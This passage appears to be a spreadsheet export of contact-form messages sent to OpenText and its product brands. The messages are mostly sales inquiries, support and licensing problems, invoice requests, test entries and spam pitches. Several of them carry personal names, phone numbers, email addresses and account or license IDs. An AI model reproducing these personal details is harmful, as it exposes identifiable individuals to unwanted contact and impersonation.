List includes key contacts like- CEO's/CIO's/CTO's/CSO's/CFO's, Analysts/Academics/Researchers, IT Directors/HR Directors/Security managers, Border Protection Specialists, Coast Guards/ Insurance Services, Disaster &amp; Crisis Management, Immigration Officials/Project managers, Intelligence Agencies/Installers, IT &amp; Cyber Security Professionals, Logistics &amp; Supply Chains/Integrators, Paramilitary Specialists//Security Consultants, Private Security Agencies, Public Security &amp; Safety Organizations, Security Establishments &amp; Institutes, System Integrators/Training &amp; Simulation, Transport Operators_x000D_
_x000D_
Complete Data fields: All our records includes permission based business email addresses and complete business contacts like contact name, company name, company URL, title,    phone number, Fax number, physical address, employee size, revenue size, SIC code, industry classification and last verified date._x000D_
 _x000D_
Kindly let me know if I can be of help so that I can give you more information, Counts Pricing for your review. You may indicate your interest in the below mention parameters._x000D_
 _x000D_
Target Industry    : _x000D_
Target Geography:_x000D_
Target Job Title      : _x000D_
 _x000D_
Looking forward for your response._x000D_
_x000D_
Regards,_x000D_
Lucy Williams | Business Development coordinator_x000D_
_x000D_
Consumer List | Technology List | Healthcare list | Event Promotion | Email Appending | Email Campaigns | SEO |Content writing| Telemarketing services._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We use bloomberg open terminals and are looking for a solution to archiving all chats. Can your product support chat archiving on bloomberg open and if so, how much does it cost?_x000D_
thanks_x000D_
_x000D_
Matt_x000D_
</t>
  </si>
  <si>
    <t>Hello_x000D_
What are your conditions for being a partner?_x000D_
Please give brief information._x000D_
yours sincerely._x000D_
Murat Karademir</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour nous avons un problème avec OpentText content server, après création d'un compte, il est impossible d'accéder au site qui se situe derrière l’authentification . Lorsque nous flashons le QR code généré par OpenText Content Server, ça tourne dans le vide et il nous est impossible de nous connecté. _x000D_
Pourriez vous faire le nécessaire pour que cela soit corrigé dans les plus bref délais. _x000D_
Merci d'avance _x000D_
Romain Mignot_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
We are currently scoping for a redaction tool which uses AI to automate the process. Could you confirm what redaction capabilities OpenText Redact-It offers, and organise a demo for myself and some colleagues? _x000D_
_x000D_
Many thanks_x000D_
_x000D_
Zoe</t>
  </si>
  <si>
    <t>Hello,_x000D_
My company is using ECS and Delta since a long time for different customers around Europe. We are very concerned about the lack of support on these products. We currently have to consider migrating our customers on other products due to business risk!_x000D_
Could you please contact me directly to tell me how you intend to manage the support of these products and if we would better look for another solution?_x000D_
Thanks and regards,_x000D_
Boris Lemaître</t>
  </si>
  <si>
    <t>Start a store</t>
  </si>
  <si>
    <t>I want to run email campaigns, so i need your service for this, and want to discuss over it.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Good day. I am writing this with regards to a training request query for OpenText Vendor Invoice Management and Invoice Capture Center products. We need few details for the for the following training:_x000D_
_x000D_
3-2105 Vendor Invoice Management (VIM) for SAP Solutions Consultant Bootcamp_x000D_
_x000D_
Details required are :_x000D_
_x000D_
•	Price quotation for 10 students_x000D_
•	Availability of training at Offshore/Remote training_x000D_
•	Schedule when training can be arranged earliest_x000D_
_x000D_
We hope to hear back from you soon and can schedule a call as well if required. Thanks in advance._x000D_
</t>
  </si>
  <si>
    <t>Do you have developer licenses? I am interested in integrating with Documentum.</t>
  </si>
  <si>
    <t>We have encountered some problems during using exceed software and we need to open a case to solve it._x000D_
Can you tell me the method to open case and what information do we need to provide?</t>
  </si>
  <si>
    <t>May I know if you are accepting applications / walk ins on Saturdays? Thank you! :) And if yes, what time is it possible to apply to your company?</t>
  </si>
  <si>
    <t>Hi team,_x000D_
Request you to mirror ID with swapnil.kumar.sharma . Me and Swapnil both are working in the same company for the same project._x000D_
Request you take this on priority. If  needed kindly reach out on my Phone +91 9821591963 or on my email id.</t>
  </si>
  <si>
    <t>Hello, I'm currently looking for a file management software to implement in my fast growing law firm and edocs seems as a good choice. I would like to get into contact with the corresponding parties in order to get all the details and confirm if we can implement it. Thank You.</t>
  </si>
  <si>
    <t>Hello, I am interested in your on-premise DAM services for my company. We are looking for a service to organize our video footage by keyword, and are curious what sort of offerings you have. If someone would be willing to get in touch with me to chat, I would love to hear more about your services. Thanks!</t>
  </si>
  <si>
    <t>Our company is looking for an Enterprise Digital Asset Management (DAM) Solution. We would need a contact for a large enterprise customer. We are wanting to include Opentext in our DAM RFP, which we would like to launch tomorrow, 1/4/2019. Once we have a contact, I will need to send our Non-Disclosure Agreement and will need it to be signed rather quickly. i can provide more detail once we have an identified contact.</t>
  </si>
  <si>
    <t>Sent the request confirmation email multiple times with the same result not being able to view the help documents/view serial numbers/purchased software. Is this something you’re able to assist with?</t>
  </si>
  <si>
    <t xml:space="preserve">Information on exhibitor opportunities </t>
  </si>
  <si>
    <t>Requesting the open invoices for 2018;_x000D_
I haven't received the invoice from December 2018, can you please provide copy of it?</t>
  </si>
  <si>
    <t>Please send w-9 form to dinal@greatwallny.com</t>
  </si>
  <si>
    <t>Requesting to disconnect 844-534-2010 from account 852174, service no longer needed, please disconnect immediately._x000D_
_x000D_
Please provide order number and due date._x000D_
_x000D_
Thanks,_x000D_
Lisa</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm interested on finding out more about the Teleform product and if it would meet my customer requirements. _x000D_
I'm working on a project for a customer that would like us to build a database from image-based PDF files. We need a tool to allow us to extract key information from the image-based PDF files and save the information along the original file into a SQL server database._x000D_
Thank you</t>
  </si>
  <si>
    <t>I would like to know if we have an account rep for our organization and if so how to setup a meeting to discuss account support, new products, etc.</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern,_x000D_
I am working to provide general Encase system documentation for one of my customers. The End User number associated with my customer's account is 10445234 I am trying to document the Encase POC whom the customer may contact regarding the purchase made (business POC phone and email), current license data associated with the account and current support . Please advise if there is someone who can assist in obtaining this information. _x000D_
_x000D_
thank you!_x000D_
Angela D. Leno_x000D_
VP Operations_x000D_
Sevatec, Inc._x000D_
</t>
  </si>
  <si>
    <t>Interested into a corporate solution for records management</t>
  </si>
  <si>
    <t>pricing on TX1</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am interested in pursuing the Encase Certified examiner certification. However I am confused at what learning is required. Any insight on this would be much appreciated. _x000D_
Thanks. </t>
  </si>
  <si>
    <t>Need Guidance about OpenText 10.5 Migration to AWS. Also need Guidance about OpenText Upgrade from 10.5 t0 16.2.</t>
  </si>
  <si>
    <t>test Aldi DE</t>
  </si>
  <si>
    <t>test Aldi UK</t>
  </si>
  <si>
    <t>test Aldi EN</t>
  </si>
  <si>
    <t>Test SE</t>
  </si>
  <si>
    <t>test BR</t>
  </si>
  <si>
    <t>test UK</t>
  </si>
  <si>
    <t>test de</t>
  </si>
  <si>
    <t>test 321</t>
  </si>
  <si>
    <t xml:space="preserve">Unpaid Invoices below: need more detail for delay_x000D_
                                                                          DUE:_x000D_
2018DSAC015176	For review/processing	12/16/2018_x000D_
2018DSAC014007	For review/processing	11/15/2018_x000D_
2018DSAC015524	For review/processing	12/30/2018   and:_x000D_
61,716.77	2018DSAC013945	4500007767	RN0000512386	SIT00008023	HUF NORTH AMERICA AUTOMOTIVE PARTS MF	2018-10-14_x000D_
524.06	2018DSAC014007	 	PO_IUS0048391	200000000049668	AVON AUTOMOTIVE HOLDINGS INC	2018-10-16_x000D_
4,191.92	2018DSAC014036	4500011069	RN0000488519	SIT00006574	WELLINGTON INDUSTRIES INC	2018-10-17_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>What is my current plan and monthly payment requirement?</t>
  </si>
  <si>
    <t>test 2</t>
  </si>
  <si>
    <t>Requesting an updated W-9 from your company to be emailed to w9@nglep.com</t>
  </si>
  <si>
    <t>Hello, I just received a suspicious email with Hightail logo at the top. This is what it said:_x000D_
Your receipt		_x000D_
Order ID: ch_1DoYfkCoGUa9VTUcGTQIiezH		_x000D_
_x000D_
_x000D_
Your Card •••• •••• •••• 1004 was charged $144.00_x000D_
You'll be charged $144.00 every year				_x000D_
*********************************_x000D_
_x000D_
Is this a real invoice? Or is it a scam? I do NOT want to be charged anything for your service because I am not using it. Thank you.</t>
  </si>
  <si>
    <t>this is a test of contact form corp, please ignore</t>
  </si>
  <si>
    <t xml:space="preserve">Been a hightail customer for years.  Went to send a file and I ended up here._x000D_
I want to send a file - just tell me how to do it.  Better yet, restore what worked until you make something better._x000D_
Country boys would say "it's broke, fix it!"_x000D_
RF_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the pre-acquisition phase of a new Physical Records Management Solution. They are currently running an old (on-premise) version of OmniRim. Managing 65,000 file boxes (in 2 Records Centre locations); requirement is for 30 named software users. They would like a new solution implemented by Q3/2019._x000D_
_x000D_
We are looking for specific physical Records Centre management functionality e.g. physical records management only - including certifying dispositions and managing accession requests. Electronic records management is done currently by their Filenet solution._x000D_
_x000D_
Please contact for more info!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I need support for Exstream Dialogue issues and below is the information_x000D_
_x000D_
Service Agreement ID(s): 103476356873_x000D_
_x000D_
Exstream Workstation (Flex) :_x000D_
- P:dfi3eu65_x000D_
_x000D_
**Customer: CI INVES_x000D_
</t>
  </si>
  <si>
    <t>Short of money need help</t>
  </si>
  <si>
    <t xml:space="preserve">This has been a confusing process for me to wrap my head around.  Jefferson County SO (JESO) has three (3) licenses for Redact-IT Desktop TR.  Each of our desktops are running a different build, package of the product.  My understanding was that Opentext was aware of and issue that JESO was having.  When people were working on redacting a document and they attempted to ‘undo’ several steps, the entire product would freeze and had to be restarted.  I was advised that the issue was going to be addressed when a new version of Brava was released and that JESO would need to migrate to Brava Desktop?  Our sole use of your product is for redacting Word and PDF document._x000D_
_x000D_
Our desktops are all running Windows 7 Professional-64-bit OS and our current Redact-IT versions are: all at the same email ending as my email_x000D_
_x000D_
_x000D_
I need to get all of our desktops on the same version.  Please let me know _x000D_
_x000D_
I have been trying to get this resolved since October and I keep getting emails showing ticket closed.  Please contact me by phone 920-674-7317_x000D_
</t>
  </si>
  <si>
    <t>Requesting Demo - ECM software overview</t>
  </si>
  <si>
    <t>Je suis amené à faire des recommandations d'outils de traitement des factures fournisseurs pour mes clients. J'ai besoin de vous rencontrer pour comprendre les éléments différenciateurs de la solution OPENTEXT. Merci. Bertrand Allard, Partner, Argon Consulting</t>
  </si>
  <si>
    <t>Our website, www therostermonster com consolidates Iowa high school sports data into one site for easy historical and seasonal stat information.  We currently use a mix of data views and Tableau and are looking for a solution that can access our data real time for chart and table views.  Our data is in MS SQL Server 2012.  We are a start-up so our budget is tight.  What is the cost of your products that would allow us to develop reports/dashboards and embed them into our website?</t>
  </si>
  <si>
    <t>Hi I am trying to download the EnCase Forensic Imager, but it doesnt seem I can get to a download page.  Can you assist with that?</t>
  </si>
  <si>
    <t>In october 2017 I paid the fee ( $ 174) for using Brava! Desktop CXL, and received "License instructions for.Brava! Desktop CXL 16.2. In the following weeks I have not been able, to download the software as I was also unable to find the item Accounts on the top menu. In general I found your instructions really cumbersome,, and heard the same from others. As i have been abroad for some time I left this problem. Now coming back I feel a need to use this software. Recently I received an email concerning the prolongation of the maintenance renewal. HAve you a proposal to end  this embarassing situation?</t>
  </si>
  <si>
    <t>We are interested in your tool for organization and we would like to know all the plans and subscription amounts.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
As presales manager for OpenText solutions (France), I'm looking for a solution which would allow to translate any documents : instructions for uses, packaging, composition (ingredients), etc. _x000D_
_x000D_
I refered to the OpenText Knowledge Center and I find a product that named « OpenText Automatic Translation Service, Gist-In-Time (GIST) ». The version is 5.5. There is no version 16.0.  _x000D_
Is this solution always maintained ? Or is it a service like you present to the your web site ? _x000D_
_x000D_
Who is the manager for this solution or service in France ? _x000D_
_x000D_
Thanks a lot for your reply and your help._x000D_
_x000D_
Best regards, _x000D_
Alexandre_x000D_
</t>
  </si>
  <si>
    <t>We want to buy new Alchemy Software which can be installed on 2016 Windows Server.</t>
  </si>
  <si>
    <t>Looking to discuss your ECM solution for a possible project to consolidate our current systems and expand our capabilities</t>
  </si>
  <si>
    <t xml:space="preserve">Please send me a quote for OpenText Exceed Powersuite_x000D_
Qty:1 </t>
  </si>
  <si>
    <t xml:space="preserve">We are bidding for a large pipeline project in East Africa with TOTAL E&amp;P France._x000D_
As part of the project delivery we have been requested to use your eRoom software for Interface management._x000D_
Could you please provide a unit cost per license and costs for training??_x000D_
Thanks in advance_x000D_
Gary Burks </t>
  </si>
  <si>
    <t>I like to train bodyguard</t>
  </si>
  <si>
    <t xml:space="preserve">I want to integrate Fax2Email service in one application. I need help on API integration side. Our company follows Hipaa guidelines. </t>
  </si>
  <si>
    <t>Please provide link to book for basic E0 documentum certification exam</t>
  </si>
  <si>
    <t>Good morning this is UPS Canada calling. We have a ground shipment from IMPRINTS AT THE BLUE DOOR for CHRISTINE MATLA in the Richmond Hill office that requires Customs clearance and we need your broker information before it can clear._x000D_
_x000D_
Please e-mail us at broker@ups.com with your shipment ID, the name of your Customs broker or authorization for UPS to clear the shipment on your behalf. You can also call 1-888-520-9090 with your information and refer to the shipment ID number. (1Z81345E6899534035). UPS is a full-service Customs broker and we would be happy to clear this shipment on your behalf. Thank you for using UPS.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
We contacted you before Christmas as we need to set up an easylink account to receive commission statements from product providers which then needs to link into our new back office system with Now Advise (Focus Solutions Ltd). We were previously with Intelligent office and we understand that we previously received our statements through their link._x000D_
_x000D_
Please can you contact me to make the arrangements.</t>
  </si>
  <si>
    <t>Please send instructions on how to get Serial Number/System ID?</t>
  </si>
  <si>
    <t>I just want to improve my skills and make a difference in my community</t>
  </si>
  <si>
    <t>Not able to  view Opentext content_x000D_
https:/knowledge.opentext.com/knowledge/llisapi.dll/Open/76169892</t>
  </si>
  <si>
    <t>Wanted to check how to access opentext documentum 7.3 content server for trial</t>
  </si>
  <si>
    <t xml:space="preserve">Having issues access the webware portal , Please can you make contact. I would paste the link in below but you state not too_x000D_
_x000D_
Kind regards, _x000D_
_x000D_
Simon </t>
  </si>
  <si>
    <t>There seems to be a problem accessing guidance software website from Google Chrome. I get an error, about my connection not being private, NET ERR CERT INVALID. The webpage seems to load fine under Firefox.</t>
  </si>
  <si>
    <t>Hello,_x000D_
due to a change in our company I had to change my e-mail from ulrich.binninger@infoserve.endress.com to ulrich.binninger@endress.com._x000D_
However I belong to the same company and my duties are the same. But I don't have access to the support in the knowledgebase anymore._x000D_
The e-mail veruification is not working!_x000D_
_x000D_
Could you please fix this?_x000D_
_x000D_
Regards,_x000D_
Ulrich</t>
  </si>
  <si>
    <t>Dear Team, I am based out at Bangalore, India and currently working with Consilio as Manger-Operation ( eDiscovery). I am very much interested in EnCase certification; however, I am not sure how to proceed with it in terms of syllabus and the resources. We are currently using EnCase 6.19 and 8. May I please request how to proceed with registration and syllabus to study in order to start with Phase 1 written assessment?_x000D_
_x000D_
Regards,_x000D_
Neeraj Thakur</t>
  </si>
  <si>
    <t>Dear,_x000D_
_x000D_
we have open text system in our organization, we are looking for maintenance and support from local company which is certified from open text. could you provide us the list of companies?_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Learning SAP VIM. Can i get access to do hands on practice ? _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a job </t>
  </si>
  <si>
    <t>Dear Encase team,_x000D_
_x000D_
I'd like a quotation for "ENCASE FORENSIC"._x000D_
The quotation should be for a 3 machines license for 3 years._x000D_
_x000D_
Please share the quotation ASAP._x000D_
_x000D_
Regards,_x000D_
Majed</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I have been trying to call your Singapore office for the past 15 mins to inquiry on Sales on OpenText, but has been very unsuccessful. Please call back asap. Thank you. </t>
  </si>
  <si>
    <t>We are a small beauty company and need to get set up with your system to become a vendor with Kohls department store.  Please let me know how to get a quote for your UPC catalog system.  Thanks.</t>
  </si>
  <si>
    <t>how and who do I make a complaint to regards severe Data breech</t>
  </si>
  <si>
    <t>Not able to access my tickets in support portal. Getting error "No Access_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource." I had access to this till 12/31/18, but not anymore.</t>
  </si>
  <si>
    <t>Please add me under  - Documentum Standard Support (NA): Chevron Corporation - EU0223249   , so that I can raise support tickets for issues that we face.</t>
  </si>
  <si>
    <t>Authorize an additional user - Lynne Caputi of Synergy Global Solutions.  We use SGS as network consultants.  Thank you.</t>
  </si>
  <si>
    <t>We are re-sellers that have a Federal customer looking to purchase Exceed Ondemand #1000025434-1 and #1000025435-1 QTY 30. Where should we go?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Our computer forensic team at Deloitte is in the possession of MacBook which has been wiped. Upon imaging the MacBook, it was found that the drive did not have folder/file structure. When previewing the image and looking at the Hex values, it was found that there were remnants of data which are not readable as the data is fragmented. Is there a way to rebuild or reconstruct the drive/operating system so that it can be restored to what it was?_x000D_
_x000D_
Let me know if more information is need._x000D_
_x000D_
Thank you for your help._x000D_
_x000D_
Regards,_x000D_
Elijah Pardinas_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Coldwater Direct is looking for a Cloud Based Partner to integrate ASN program with vendor base and DC._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">The City of Nanaimo recently published an RFI for Electronic Content Management System of which OpenText may interested.  </t>
  </si>
  <si>
    <t>TK7U-BNDLB_x000D_
_x000D_
Hi,_x000D_
_x000D_
We would like to purchase TK7U-BNDLB kit to use on PCIe (NVMe) Solid State Drives. Since we are a public entity, we need to have 3 quotes to complete purchase. Do you have any seller works with Texas DIR (Department of Information Resources)? If not please send a full list of sellers, preferably the local TX companies._x000D_
_x000D_
Email contact preferred. Thank you._x000D_
_x000D_
Safa Aktepe</t>
  </si>
  <si>
    <t xml:space="preserve">Annual Service/maintenance agreement. We had an annual agreement with Guidance for EnCase. Did not receive notice this year to renew. </t>
  </si>
  <si>
    <t>Wanted to speak to Business Development about partnering with our multi-media marketing platform - which we can brand for you and your customers - please take a look at leadspleaseplus - Cheers Graham</t>
  </si>
  <si>
    <t>Question:  I understand from you Website that the product is Section 508 compliant, but what about the documents that are stored in or generated from the software?  Are they checked for Section 508 compliance?</t>
  </si>
  <si>
    <t>I have been supporting Documentum in CSA Group and had a support account with EMC. I want to be sure I can open support ticket in case it is needed.</t>
  </si>
  <si>
    <t>I am replacing a users pc with a new one. The old one has Brava Desktop TX downloaded to it. Can I download the software to the new pc without issues?_x000D_
Thanks_x000D_
Cheryl</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We have a client that is currently using version 5.3.1 or your eDocs software and would like to discuss the options for upgrading. They are possibly interested in a cloud version if available but since they are far behind the current versions, I wasn't sure if there would be issues in upgrading._x000D_
_x000D_
Thank you._x000D_
_x000D_
Zak Coffey</t>
  </si>
  <si>
    <t>Interested in purchasing Encased forensic tool. Can I speak to sales folk?</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to see if we can get a temporary license extension as ours expired in October. Our procurement department dropped the ball in getting this procured as we submitted the paperwork in August. It has been escalated on our side and bids are now out to vendors and are waiting response so it should be completed in the next couple of weeks. So I was wondering if there was any way to bridge that gap?_x000D_
_x000D_
Thanks_x000D_
Jess_x000D_
</t>
  </si>
  <si>
    <t>Dear,_x000D_
i am interested to know the availability and the price of RightFax Express appliance 8 analog,</t>
  </si>
  <si>
    <t xml:space="preserve">I couldn’t get any information on HP Exstream Desing and Production   9.0.114_x000D_
_x000D_
HP Exstream MQ Connector component  2.10.0007_x000D_
_x000D_
_x000D_
_x000D_
Would you please tell me what the current releases of the products are, and if there is a projected end of support date for the versions we are running._x000D_
_x000D_
 _x000D_
_x000D_
Additionally, are there any requirements for z/OS V2R3?_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>About the OpenText Hiring.</t>
  </si>
  <si>
    <t xml:space="preserve">Requet price quote for single user Brava Desktop and Network license. We currently have 1 engineer using a single user license to mark-up tiffs for collaboration with designers. </t>
  </si>
  <si>
    <t xml:space="preserve">Adding new users _x000D_
1. Digital Team- Digital@sunnyhealthfitness.com_x000D_
2. Mandy Chen- Mandy@sunnydistributor.com _x000D_
_x000D_
Thank you, </t>
  </si>
  <si>
    <t>Application for a Scholarship</t>
  </si>
  <si>
    <t>We are looking for a cloud based inbound/outbound fax solution that can be integrated into our web application.  The solution must easily scale and be easy to implement.</t>
  </si>
  <si>
    <t>We currently are using CS 10.5 (Office of the Attorney General) and I am looking for information on having your Professional Services team assisting us on upgrading our current version.  Email is my preferred method of contact._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>We currently are using an older RightFax solution_x000D_
Rightfax System ID:  80023-12156  (Ver 9.4)_x000D_
_x000D_
No current support contract. I would like to understand options for upgrading to allow support of Win10.  Objective is to reduce any on premise hardware and review prior license options. Additionally, I would like more information about the different email options.</t>
  </si>
  <si>
    <t>I need to create a commission invoice to Reitmans.  What do I do</t>
  </si>
  <si>
    <t>I urgently ask to provide me the link for certification exame (Documentum D7 Developer Certificaion : server programming) within tomorrow 3 January (I have already subscribed the certification request - today) my user ID is RVEROLLA_x000D_
_x000D_
THX</t>
  </si>
  <si>
    <t>Im trying to use your program to open and save tiff's with obscure compression protocol.  Is there an api or command interface that I can call to open a tiff and publish it back out ?  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">I need some information about Right fax, We already have a client in Sudi Arabia they are using right fax and they want to save fax in Oracle database or SQL database directly, What they are using now is Exchange server is it possible to directly save from right fax to oracel ?_x000D_
</t>
  </si>
  <si>
    <t>We currently utilize Liaison (OpenText) for AS2 connections. In the next few weeks we would like to onboard two new clients. How do we go about adding them to our existing connection?</t>
  </si>
  <si>
    <t>Hi team, could you confirm on the latest release/patches for product Media Management Connector for Content Server?_x000D_
Also let us know if this can be packaged separately? Or is this bundled with other major product?</t>
  </si>
  <si>
    <t xml:space="preserve">Department of Medical Assistance Services is looking to switch from on-prem RightFax to RightFax cloud.  Need info on costs.  Need to consider fax content contains PHI.  High volume faxing (~35k pages/mo). </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
_x000D_
Mein Name ist Ana Nikolova, ich arbeite für iCOVER und wir sind Sterling UK (Swansea) Partner, welche weltweit die Angaben von Bewerbern bei Firmen überprüft.. In diesem Fall handelt es sich um ein Referenzersuchen für ehemalige Mitarbeiter. Unser Ziel ist, diese Bestätigung aus Ihrer Personalabteilung zu erhalten._x000D_
_x000D_
_x000D_
Bitte bestätigen Sie, ob Sie der richtige Ansprechpartner für diese Art Verifikationen sind und in der Lage sind, die Details des Kandidaten/der Kandidatin zu überprüfen._x000D_
_x000D_
Wenn ja, wir schicken Ihnen die Einzelheiten der ehem. Beschäftigung  und die unterzeichnete Zustimmung des Kandidaten / der Kandidatin für die Freigabe der Information._x000D_
_x000D_
_x000D_
Wenn Sie nicht der richtige Ansprechpartner für diese Verifikation sind, könnten Sie uns bitte die Kontaktinformation der richtigen Person oder Abteilung zur Verfügung stellen, die in der Lage sind, diese Anfrage zu bearbeiten?_x000D_
_x000D_
_x000D_
Vielen Dank für Ihre Zeit_x000D_
_x000D_
Freundliche Grüße,_x000D_
_x000D_
Ana Nikolova</t>
  </si>
  <si>
    <t>I am unable to download my Software Order Number 1098709  License Key G2002082480</t>
  </si>
  <si>
    <t xml:space="preserve">Updated W-9 form is needed in order to submit payment on a recent invoice. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking at FOIP to replace our analog faxing.  Please contact me so we can discuss operational details and work on getting a quote from you._x000D_
_x000D_
Thank you,_x000D_
Joel Worthington_x000D_
Casey's General Stores_x000D_
joel.worthington@caseys.com</t>
  </si>
  <si>
    <t>Can you send me anything indicating which Guidance Software webinars I have registered for over the last 3 years?  2 years?  1 year?  Anything would be helpful.  Thank you.</t>
  </si>
  <si>
    <t>Applicant</t>
  </si>
  <si>
    <t>Your job postings are not not allowing uploads from GDrive because your app or domain is not authorized. Let me know if you want a screenshot. Otherwise, how do I apply?</t>
  </si>
  <si>
    <t>I'm trying to setup a catalog for this Vendor, however I cannot find the appropriate website to do so._x000D_
Can i get some urgent help with this??</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to access the My Support resource and have verified my account 3x times already. Please can you see why I still don't have access. </t>
  </si>
  <si>
    <t>If I take an Open Text class, how much, if any can be applied to the Annual Passport?  Also, is there any discount for non-profit organizations?  I am looking to take the Workflow class January 7 -9, 2018</t>
  </si>
  <si>
    <t>Hi,_x000D_
One of our prestigious customer is having requirement for Tableau Forensic PCIe Bridge T7u, Qty 10 units._x000D_
Kindly help with best quote for the same._x000D_
Location- Bangalore, India</t>
  </si>
  <si>
    <t xml:space="preserve">Where to download the latest setup for Right fax exchange connector for Exchange 2016._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We can promote your website on google by doing SEO of your website at a very low cost of just $99 per month onwards. _x000D_
 _x000D_
If you would like to know more about this, please send a quick email to us._x000D_
_x000D_
Best_x000D_
Hemlata| Skype: ranksindia_x000D_
Cell/ Whatsapp: +91 9212464161</t>
  </si>
  <si>
    <t>In our organisation, we are looking out for the opportunity of integrating TeamSite as our content management system. We would like to have a demo on the product and we would also like to have a hands-on._x000D_
_x000D_
Please reply on the possibility of having a demo and a contact person for the followups._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Support Team,_x000D_
_x000D_
I tried to create a account to Download EnCase but It would not work. Cloud you please check your account creation Form? Or Create me a account with access rights to Download the Software. Thanks_x000D_
Peter_x000D_
</t>
  </si>
  <si>
    <t>After migration form Guidance Encase to Open text organisation , I could not able to download latest update Encase Version , I unable to find encase download in your site, kindly help me to download Encase software.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not able to download EnCase Forensic Version 7.10.05 Setup (x64) from the portal, by dongle no is G2002073340 , ME 1001-02-140-0021 may I know that is the expiry date </t>
  </si>
  <si>
    <t>Need to know about vendor invoice management solutions at OpenText.</t>
  </si>
  <si>
    <t>Need Help to understand if this software can replace our existing Mocha API for TN3270/TN5250/Telnet</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
How are you doing? _x000D_
_x000D_
Are you looking for the combined set of web services? _x000D_
_x000D_
I can help you get the best in industry web design and mobile app services. _x000D_
_x000D_
Also, get some amazing SEO services for website ranking._x000D_
_x000D_
Thanks_x000D_
Lisa | Whatsapp: +91 9212464161_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please arrange for demo </t>
  </si>
  <si>
    <t>Hello there. I would like to enquire about whether OpenText has capabilities to support implementation of a Regulatory Affairs database.  The database would be tool for storing and sharing product Regulatory information, creating workflows etc across the organisation.  Products would me (low-risk) medicines, cosmetics, health foods etc supplied in a number of markets.  Please do feel free to email me initially.  _x000D_
Mary</t>
  </si>
  <si>
    <t>Unable to login to open text site and change password. Please check if my account is active</t>
  </si>
  <si>
    <t xml:space="preserve">I want to download OpenText Brava!, integrate with ECM( IBM Filenet or DCTM) to view, annotate, redact document( image, PDF, MS Office file) in desktop and mobility device for purpose: demo to new ECM customer. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Cannot create an My Support account._x000D_
Cannot connect to your Support phone 18004996544._x000D_
</t>
  </si>
  <si>
    <t>i am trying to log into my fax account_x000D_
678-369-7261 and am having difficulties</t>
  </si>
  <si>
    <t xml:space="preserve">I need to install EnCase Processer </t>
  </si>
  <si>
    <t>I don't now</t>
  </si>
  <si>
    <t>OTCS Ticket 4036881- Please provide the stautus on this ticket</t>
  </si>
  <si>
    <t>I have 8 months of Experience in salesforce as a developer and admin , looking for job</t>
  </si>
  <si>
    <t>node is not working</t>
  </si>
  <si>
    <t>We need DFC Runtime Environment installation but we are not able to see My Support page as well as any link from where we can install the Documentum DFC Runtime Environment. Can you please help.</t>
  </si>
  <si>
    <t>Looking for a replacement option for our Old Windows Fax server for networked users to send faxes to other hospitals for patient care. Only a small handful of faxes are sent per day with a total of 30 on a rotating schedule. I think your Healthcare version may be too large for us, but the RightFax may be an option. I have a few questions on setup, config, and basic use to determine if possible for my office</t>
  </si>
  <si>
    <t>Looking for a user's manual for 'RightFax Fax Util' client user version 10_6_3_3067.  Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">We use EnCase and in the user guide I found that we need to review the EnCase Safe User Guide to set up different types of hard drive captures but I cannot find a copy of this anywhere as all the links for it are for Guidance which redirects you to Opentext and I cannot find any documentation on the Opentext website. </t>
  </si>
  <si>
    <t>Trying to get a hold of my Sales Person.  I'm sending emails to Christopher Tedesco and calling him at 301-340-4011.  Does he still work for you?  This has been going on since early December.  Is there someone else I can talk to.</t>
  </si>
  <si>
    <t>I need current updated download files for Open Text Exceed v. 14 and Open Text HostExplorer v. 14, this is for testing at TSA. We currently have both end of life versions in our environment and require updates ASAP.</t>
  </si>
  <si>
    <t>I have made a software product that integrates with the ApplicationXtender product line that OpenText has purchased a little while ago. This software product has been around for several years, prior to OpenText, Dell or EMC owning the ApplicationXtender product line. It was created when the software was still owned by Legato._x000D_
_x000D_
I have customers that are interested in what OpenTexts official stance is to the usage of this software product on their system. The product allows software based retention, document undeletion and audit log management on an ApplicationXtender system. I would be happy to discuss this product and it's technical details with someone if your company would like to setup a call about it._x000D_
_x000D_
Thanks,_x000D_
Greg Conely</t>
  </si>
  <si>
    <t xml:space="preserve">We are having difficultly paying invoice online._x000D_
Can you send a link to pay? </t>
  </si>
  <si>
    <t>Is RightFax HIPAA compliant for healthcare related faxing?</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
COMPAREX est short-listé par le groupe La Poste afin de répondre à leur consultation de distribution de logiciels et de services associés._x000D_
